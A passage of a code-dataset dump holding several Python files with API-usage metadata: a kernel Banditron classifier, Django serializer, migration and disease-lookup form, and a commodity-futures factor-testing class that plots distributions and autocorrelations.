"name"}, {"api_name": "apps.routes.models.Route.objects.create", "line_number": 28, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 
28, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 26, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 34, "usage_type": "call"}, {"api_name": "apps.routes.models.Route", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Polygon.from_bbox", "line_number": 59, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Polygon", "line_number": 59, "usage_type": "name"}, {"api_name": "apps.routes.models.Route.objects.filter", "line_number": 79, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 79, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 101, "usage_type": "call"}, {"api_name": "apps.routes.forms.tracks_file.TracksFileForm", "line_number": 107, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 110, "usage_type": "call"}, {"api_name": "apps.routes.forms.tracks_file.TracksFileForm", "line_number": 112, "usage_type": "call"}, {"api_name": "django.template.context_processors.csrf", "line_number": 114, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 115, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 104, "usage_type": "name"}, {"api_name": "apps.routes.models.Route.objects.get", "line_number": 120, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 120, "usage_type": "name"}, {"api_name": "django.conf.settings.GOOGLE_MAPS_API_KEY", "line_number": 124, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 124, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 125, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 118, "usage_type": "name"}, {"api_name": "django.middleware.csrf.get_token", "line_number": 131, "usage_type": "call"}, {"api_name": "django.conf.settings.GOOGLE_MAPS_API_KEY", "line_number": 132, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 132, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 134, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 128, "usage_type": "name"}, {"api_name": "apps.routes.models.Route.objects.get", "line_number": 139, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 139, "usage_type": "name"}, {"api_name": "django.conf.settings.GOOGLE_MAPS_API_KEY", "line_number": 146, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 146, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 147, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 137, "usage_type": "name"}]} +{"seq_id": "436989586", "text": "import numpy as np\nfrom enum import Enum\nimport sys, 
os\nsys.path.append(os.pardir)\nfrom banditron import Banditron\nimport warnings\nwarnings.simplefilter(\"error\", RuntimeWarning)\n\nclass kernel(Enum):\n gauss = 0\n polynomial = 1\n\n\nclass condition_error(Exception):\n pass\n\n\nclass Banditron_kernel(Banditron):\n def __init__(self, x, y, g = 1.0, B = 500, gamma = 0.5,\n test_interval:int=1000, normalize:bool = True):\n \"\"\"\n :param x:\n :param y:\n :param g:\n :param eta:\n :param test_interval:\n \"\"\"\n super().__init__(x, y, gamma=gamma, test_interval=test_interval)\n self.g = g\n self.dim = B\n self.w = np.zeros((self.K, B))\n self.B = B\n self.bags = np.zeros((B, x[0].shape[0]))\n self.kernel = kernel.gauss\n self.normalize = normalize\n\n def train(self, t):\n \"\"\"\n :param t: the number of training.\n \"\"\"\n seq = np.arange(self.data_size)\n np.random.shuffle(seq)\n\n ol_ratio_list = []\n ol, cl = 0, 0 # the number of ordinary, complementary labels\n\n accuracy_ratio_list = []\n correct, false = 0, 0\n\n for count, i in enumerate(seq):\n x, y = self.x[i], self.y[i]\n if count == 0:\n self.bags = x.reshape(1, -1)\n self.w = np.zeros((self.K, 1))\n elif count < self.B:\n self.bags = np.vstack((self.bags, x.reshape(1, -1)))\n self.w = np.hstack((self.w, np.zeros((self.K, 1))))\n\n try:\n _ = self._fun(x)\n except RuntimeWarning:\n false += 1\n if count % self.interval == 0:\n print(count)\n print(\"ordinary labels ratio\", ol / (ol + cl))\n print(\"accuracy ratio\", correct / (correct + false))\n print('')\n ol_ratio_list.append(ol / (ol + cl))\n accuracy_ratio_list.append(correct / (correct + false))\n continue\n\n wx = self._det_fun(self._fun(x))\n predict = self._det_label(wx)\n\n gamma = self.gamma\n proposed_label, p = self._det_proposed_label(predict, gamma)\n self._update(x, predict, proposed_label, p, (proposed_label == y))\n\n\n if predict == y:\n correct += 1\n else:\n false += 1\n\n if proposed_label == y:\n ol += 1\n else:\n cl += 1\n\n if count % self.interval == 0:\n print(count)\n print(\"ordinary labels ratio\", ol / (ol + cl))\n print(\"accuracy ratio\", correct / (correct + false))\n print('')\n ol_ratio_list.append(ol / (ol + cl))\n accuracy_ratio_list.append(correct / (correct + false))\n\n final_l = ol / (ol + cl)\n final_ac = correct / (correct + false)\n return ol_ratio_list, accuracy_ratio_list, final_l, final_ac\n\n def _fun(self, x):\n if self.kernel == kernel.gauss:\n x = (np.exp(-np.sum(np.square(self.bags - x), axis=1) / self.g))\n if self.normalize:\n return x / np.linalg.norm(x)\n else:\n return x\n else:\n raise condition_error", "sub_path": "banditron_kernel.py", "file_name": "banditron_kernel.py", "file_ext": "py", "file_size_in_byte": 3386, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 4, "usage_type": "attribute"}, {"api_name": "warnings.simplefilter", "line_number": 7, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 9, "usage_type": "name"}, {"api_name": "banditron.Banditron", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 42, "usage_type": "call"}, {"api_name": 
"numpy.random", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 106, "usage_type": "attribute"}]} +{"seq_id": "645673557", "text": "from rest_framework import serializers\nfrom themes.models import Review\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n\t\"\"\"review \n\t\"\"\"\n\tclass Meta:\n\t\tmodel = Review\n\t\tfields = (\n\t\t\t'theme',\n\t\t\t'user',\n\t\t\t'comment',\n\t\t\t'rating',\n\t\t)\n\n\tdef validate(self,data):\n\t\tcomment = data.values\n\n\t\tif not comment:\n\t\t\tmsg = 'Please enter a comment'\n\n\t\treturn data\n\n\n\n", "sub_path": "details/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 419, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "themes.models.Review", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "324370003", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('info', '0008_auto_20150923_2107'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='show_deadline',\n field=models.BooleanField(default=False),\n ),\n migrations.AlterField(\n model_name='message',\n name='pub_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 9, 23, 21, 8, 35, 403994)),\n ),\n ]\n", "sub_path": "info/migrations/0009_auto_20150923_2108.py", "file_name": "0009_auto_20150923_2108.py", "file_ext": "py", "file_size_in_byte": 628, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "27753906", "text": "from django import forms\nfrom django.conf import 
settings\nimport requests\n\nclass DiseaseForm(forms.Form):\n disease = forms.CharField(max_length=100)\n\n def search(self):\n result={}\n disease = self.cleaned_data['disease']\n endpoint=\"https://disease-info-api.herokuapp.com/diseases/{disease_id}.json\"\n url = endpoint.format(disease_id=disease)\n response = requests.get(url)\n if response.status_code == 200: # SUCCESS\n result = response.json()\n result['success'] = True\n else:\n result['success'] = False\n if response.status_code == 404: # NOT FOUND\n result['message'] = 'No entry found for \"%s\"' % disease\n else:\n result['message'] = 'The Disease API is not available at the moment. Please try again later.'\n return result\n", "sub_path": "disease/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 868, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "152570589", "text": "import os\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\nfrom pandas import (Series,\n DataFrame)\nimport matplotlib.pyplot as plt\nfrom typing import Callable, Tuple\nfrom collections import defaultdict\n\nfrom utils.utility import stack_dataframe_by_fields\n\nfrom bases.base import BaseClass\nfrom data_manager.ContinuousContractDataManager import ContinuousContractDataManager\n\nplt.rcParams['font.family'] = ['sans-serif']\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\ndef get_q_later_quantile(factor_data_with_pool: DataFrame, quantile: float) -> Tuple[DataFrame]:\n \"\"\"\"\"\"\n def apply_quantile1(series):\n series.fillna(0.0, inplace=True)\n quantile1 = series[series > 0].quantile(q=quantile, interpolation='midpoint')\n return quantile1\n\n def apply_quantile2(series):\n series.fillna(0.0, inplace=True)\n quantile2 = series[series < 0].quantile(q=1 - quantile, interpolation='midpoint')\n return quantile2\n\n quantile1 = factor_data_with_pool.apply(func=apply_quantile1, axis=1)\n quantile2 = factor_data_with_pool.apply(func=apply_quantile2, axis=1)\n return quantile1, quantile2\n\n\nclass FactorTest(BaseClass):\n\n def __init__(self, file_path: str) -> None:\n \"\"\"Constructor\"\"\"\n self.file_path: Path = Path(file_path)\n\n self.factor_name: str = None\n self.factor_data: DataFrame = None\n self.factor_data_with_pool: DataFrame = None\n\n self.commodity_pool: DataFrame = None\n\n self.long_short_quantile_func: Callable = None\n\n self.quantile1: Series = None\n self.quantile2: Series = None\n\n self.continuous_contract_data_manager: ContinuousContractDataManager = ContinuousContractDataManager()\n\n # create the factor performance output directory first if it does not exist\n self.init_file_path()\n\n def init_file_path(self) -> None:\n \"\"\"\n Initialize all output directories\n :return: None\n \"\"\"\n if not os.path.exists(self.file_path):\n os.makedirs(self.file_path)\n\n distribution_file_path = self.file_path.joinpath(\"factor_distribution\")\n if not os.path.exists(distribution_file_path):\n os.makedirs(distribution_file_path)\n\n time_series_file_path = self.file_path.joinpath('time_series')\n if not os.path.exists(time_series_file_path):\n os.makedirs(time_series_file_path)\n\n 

all_time_series_file_path = time_series_file_path.joinpath(\"all_time_series\")\n if not os.path.exists(all_time_series_file_path):\n os.makedirs(all_time_series_file_path)\n\n time_series_per_symbol_file_path = self.file_path.joinpath(\"time_series\").joinpath(\"time_series_per_symbol\")\n if not os.path.exists(time_series_per_symbol_file_path):\n os.makedirs(time_series_per_symbol_file_path)\n\n time_series_per_symbol_2016_file_path = self.file_path.joinpath('time_series').\\\n joinpath(\"time_series_per_symbol_2016\")\n if not os.path.exists(time_series_per_symbol_2016_file_path):\n os.makedirs(time_series_per_symbol_2016_file_path)\n\n autocorrelation_file_path = self.file_path.joinpath(\"autocorrelation\")\n if not os.path.exists(autocorrelation_file_path):\n os.makedirs(autocorrelation_file_path)\n autocorrelation_all_symbols_file_path = autocorrelation_file_path.joinpath(\"all_symbols\")\n if not os.path.exists(autocorrelation_all_symbols_file_path):\n os.makedirs(autocorrelation_all_symbols_file_path)\n\n average_autocorrelation_file_path = autocorrelation_file_path.joinpath(\"average_autocorrelation\")\n if not os.path.exists(average_autocorrelation_file_path):\n os.makedirs(average_autocorrelation_file_path)\n\n def set_factor(self, factor_name: str, factor_data: DataFrame) -> None:\n \"\"\"\n Set the factor-value DataFrame\n :param factor_name: factor name, mainly used when saving factor-related reports\n :param factor_data: factor values, index is the trade date, columns are contract codes\n :return: None\n \"\"\"\n self.factor_name = factor_name\n self.factor_data = factor_data\n\n def set_commodity_pool(self, commodity_pool: DataFrame) -> None:\n \"\"\"\n Set the commodity pool\n :param commodity_pool: commodity pool, index is the trade date, columns are contract codes\n :return: None\n \"\"\"\n self.commodity_pool = commodity_pool\n\n def set_factor_quantile(self, func: Callable, **params) -> None:\n \"\"\"\n Set the long/short quantiles\n :param func: function that computes the long/short quantiles\n :param params: parameters of the long_short_quantile_func function\n :return: None\n \"\"\"\n if not isinstance(self.factor_data, DataFrame):\n raise ValueError(\"Please specify factor data first!\")\n else:\n factor_data = self.factor_data\n if hasattr(self, \"commodity_pool\"):\n commodity_pool = self.commodity_pool\n factor_data_with_pool = factor_data.copy()\n factor_data_with_pool[~commodity_pool] = np.nan\n else:\n factor_data_with_pool = factor_data.copy()\n self.factor_data_with_pool = factor_data_with_pool\n\n quantile1, quantile2 = func(factor_data_with_pool, **params)\n self.quantile1 = quantile1\n self.quantile2 = quantile2\n\n def get_continuous_field(self, contract: str = 'main', price: str = 'close', rebalance_num: int = 1, field: str = 'continuous_price') -> DataFrame:\n \"\"\"\n Get the data of the given field for continuous contracts\n\n Parameters\n ----------\n contract: str\n contract type, currently main or active_near; main is the dominant contract, active_near the active near-month contract\n\n price: str\n which price the continuous data is based on: close for close price, settlement for settlement price\n\n rebalance_num: int, default = 1\n number of rebalancing days, one of 1, 3, 5\n field: str, default = 'continuous_price'\n field name, e.g. continuous_price\n\n Returns\n -------\n df: DataFrame\n data of the given field for the continuous contract, usually the open or close price\n \"\"\"\n return self.continuous_contract_data_manager.get_field(contract=contract,\n price=price,\n rebalance_num=rebalance_num,\n field=field\n )\n\n def get_rankX_y_plot(self):\n \"\"\"rankX_y factor return plot\"\"\"\n\n # preliminary checks\n if not isinstance(self.factor_data_with_pool, DataFrame):\n raise ValueError(\"factor data with pool is not defined!\")\n\n factor_data_with_pool = self.factor_data_with_pool\n\n\n factor_data_with_pool_rank = factor_data_with_pool.rank(axis=1, ascending=True)\n factor_data_with_pool_rank = 

factor_data_with_pool_rank.stack(dropna=True).to_frame(\"factor\")\n\n # return_df = return_df.stack(dropna=True).to_frame(\"return\")\n\n # data = pd.concat([factor_data_with_pool, return_df], axis=1)\n # plt.scatter(x=data[\"factor\"], y=data['return'])\n\n\n\n def get_factor_distribution(self, **params) -> None:\n \"\"\"Plot the distribution histogram of factor values\"\"\"\n if not isinstance(self.factor_data, DataFrame):\n raise ValueError(\"Please specify factor data first!\")\n else:\n factor_data = self.factor_data\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n if 'bins' in params:\n plt.hist(x=factor_data.values.flatten(), bins=params['bins'])\n else:\n plt.hist(x=factor_data.values.flatten(), bins=500)\n if 'xlim' in params:\n plt.xlim(params['xlim'][0], params['xlim'][1])\n\n distribution_file_path = self.file_path.joinpath(\"factor_distribution\")\n if not os.path.exists(distribution_file_path):\n os.makedirs(distribution_file_path)\n plt.title(f\"{self.factor_name} distribution\")\n plt.grid()\n plt.savefig(distribution_file_path.joinpath(f\"{self.factor_name} distribution.png\"))\n plt.show()\n\n stack_factor_data = factor_data.stack()\n factor_description = stack_factor_data.describe()\n factor_description['skew'] = stack_factor_data.skew()\n factor_description['kurt'] = stack_factor_data.kurt()\n\n factor_description.to_csv(distribution_file_path.joinpath(f\"{self.factor_name} description.csv\"))\n\n def get_factor_time_series(self, **params) -> None:\n \"\"\"Plot the factor time series\"\"\"\n if not isinstance(self.factor_data, DataFrame):\n raise ValueError(\"Please specify factor data first!\")\n else:\n factor_data = self.factor_data\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(15, 8))\n\n time_series_file_path = self.file_path.joinpath('time_series')\n if not os.path.exists(time_series_file_path):\n os.makedirs(time_series_file_path)\n\n all_time_series_file_path = time_series_file_path.joinpath(\"all_time_series\")\n if not os.path.exists(all_time_series_file_path):\n os.makedirs(all_time_series_file_path)\n factor_data.plot(legend=False)\n plt.title(f\"{self.factor_name}_all_time_series\")\n plt.grid()\n plt.savefig(all_time_series_file_path.joinpath(f\"{self.factor_name}_all_time_series.png\"))\n plt.show()\n\n def get_factor_time_series_per_symbol(self, **params):\n \"\"\"\n Plot the time series of each symbol together with the quantile curves\n :param params: None\n :return: None\n \"\"\"\n if not isinstance(self.factor_data_with_pool, DataFrame):\n raise ValueError(\"Please specify factor data with pool first!\")\n else:\n factor_data_with_pool = self.factor_data_with_pool\n\n if not hasattr(self, \"quantile1\") or not hasattr(self, \"quantile2\"):\n raise ValueError(\"Please specify quantile1 and quantile2 first!\")\n else:\n quantile1 = self.quantile1\n quantile2 = self.quantile2\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(15, 8))\n time_series_per_symbol_file_path = self.file_path.joinpath(\"time_series\").joinpath(\"time_series_per_symbol\")\n if not os.path.exists(time_series_per_symbol_file_path):\n os.makedirs(time_series_per_symbol_file_path)\n for symbol in factor_data_with_pool.columns:\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n factor_data_with_pool[symbol].plot(label=f'{symbol}_{self.factor_name}')\n quantile1.plot(label='quantile1')\n quantile2.plot(label='quantile2')\n plt.legend()\n 

plt.title(f\"{self.factor_name}_{symbol}_time_series\")\n plt.grid()\n plt.savefig(time_series_per_symbol_file_path.joinpath(f\"{symbol}_{self.factor_name}_time_series.png\"))\n plt.show()\n\n def get_factor_time_series_per_symbol_2016(self, **params):\n \"\"\"\n Plot the time series of each symbol together with the quantile curves\n :param params: None\n :return: None\n \"\"\"\n if not isinstance(self.factor_data_with_pool, DataFrame):\n raise ValueError(\"Please specify factor data with pool first!\")\n else:\n factor_data_with_pool = self.factor_data_with_pool\n\n if not hasattr(self, \"quantile1\") or not hasattr(self, \"quantile2\"):\n raise ValueError(\"Please specify quantile1 and quantile2 first!\")\n else:\n quantile1 = self.quantile1\n quantile2 = self.quantile2\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(15, 8))\n time_series_per_symbol_2016_file_path = self.file_path.joinpath(\"time_series\").joinpath(\"time_series_per_symbol_2016\")\n if not os.path.exists(time_series_per_symbol_2016_file_path):\n os.makedirs(time_series_per_symbol_2016_file_path)\n for symbol in factor_data_with_pool.columns:\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n factor_data_with_pool[symbol]['2016'].plot(label=f'2016_daily_{symbol}_{self.factor_name}')\n quantile1['2016'].plot(label='quantile1')\n quantile2['2016'].plot(label='quantile2')\n plt.legend()\n plt.title(f\"2016_daily_{self.factor_name}_{symbol}_time_series\")\n plt.grid()\n plt.savefig(time_series_per_symbol_2016_file_path.joinpath(f\"2016_daily_{symbol}_{self.factor_name}_time_series.png\"))\n plt.show()\n\n def get_factor_autocorrelation(self, **params):\n if not isinstance(self.factor_data, DataFrame):\n raise ValueError(\"Please specify factor data first!\")\n else:\n factor_data = self.factor_data\n\n if 'lags' in params:\n lags = params['lags']\n else:\n lags = 100\n\n autocorrelation_file_path = self.file_path.joinpath(\"autocorrelation\")\n if not os.path.exists(autocorrelation_file_path):\n os.makedirs(autocorrelation_file_path)\n autocorrelation_all_symbols_file_path = autocorrelation_file_path.joinpath(\"all_symbols\")\n if not os.path.exists(autocorrelation_all_symbols_file_path):\n os.makedirs(autocorrelation_all_symbols_file_path)\n autocorr_dict = defaultdict(list)\n for symbol in factor_data.columns:\n factor_series = factor_data[symbol]\n for lag in range(1, lags+1, 1):\n autocorr_dict[symbol].append(factor_series.autocorr(lag=lag))\n autocorr_df = pd.DataFrame(autocorr_dict, index=range(1, lags+1, 1))\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n autocorr_df.plot(legend=False)\n plt.title(f\"{self.factor_name}_autocorrelation_all_symbols\")\n plt.grid()\n plt.savefig(autocorrelation_all_symbols_file_path.joinpath(\"all_symbols_autocorrelation.png\"))\n plt.show()\n\n average_autocorrelation_file_path = autocorrelation_file_path.joinpath(\"average_autocorrelation\")\n if not os.path.exists(average_autocorrelation_file_path):\n os.makedirs(average_autocorrelation_file_path)\n average_autocorr_series = autocorr_df.mean(axis=1)\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n\n average_autocorr_series.plot()\n plt.title(f\"{self.factor_name}_average_autocorrelation\")\n plt.grid()\n plt.savefig(average_autocorrelation_file_path.joinpath(\"average_autocorrelation.png\"))\n plt.show()\n\n def run_all(self):\n self.get_factor_distribution()\n 
self.get_factor_time_series_per_symbol()\n self.get_factor_time_series_per_symbol_2016()\n self.get_factor_time_series()\n self.get_factor_autocorrelation()\n \n\n\n\n\n\n", "sub_path": "factor/factor_test.py", "file_name": "factor_test.py", "file_ext": "py", "file_size_in_byte": 15582, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 22, "usage_type": "name"}, {"api_name": "bases.base.BaseClass", "line_number": 39, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 46, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 51, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 53, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 54, "usage_type": "name"}, {"api_name": "data_manager.ContinuousContractDataManager.ContinuousContractDataManager", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 98, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 101, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 111, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 119, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "argument"}, {"api_name": "numpy.nan", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 142, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 174, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 192, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path", "line_number": 209, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, 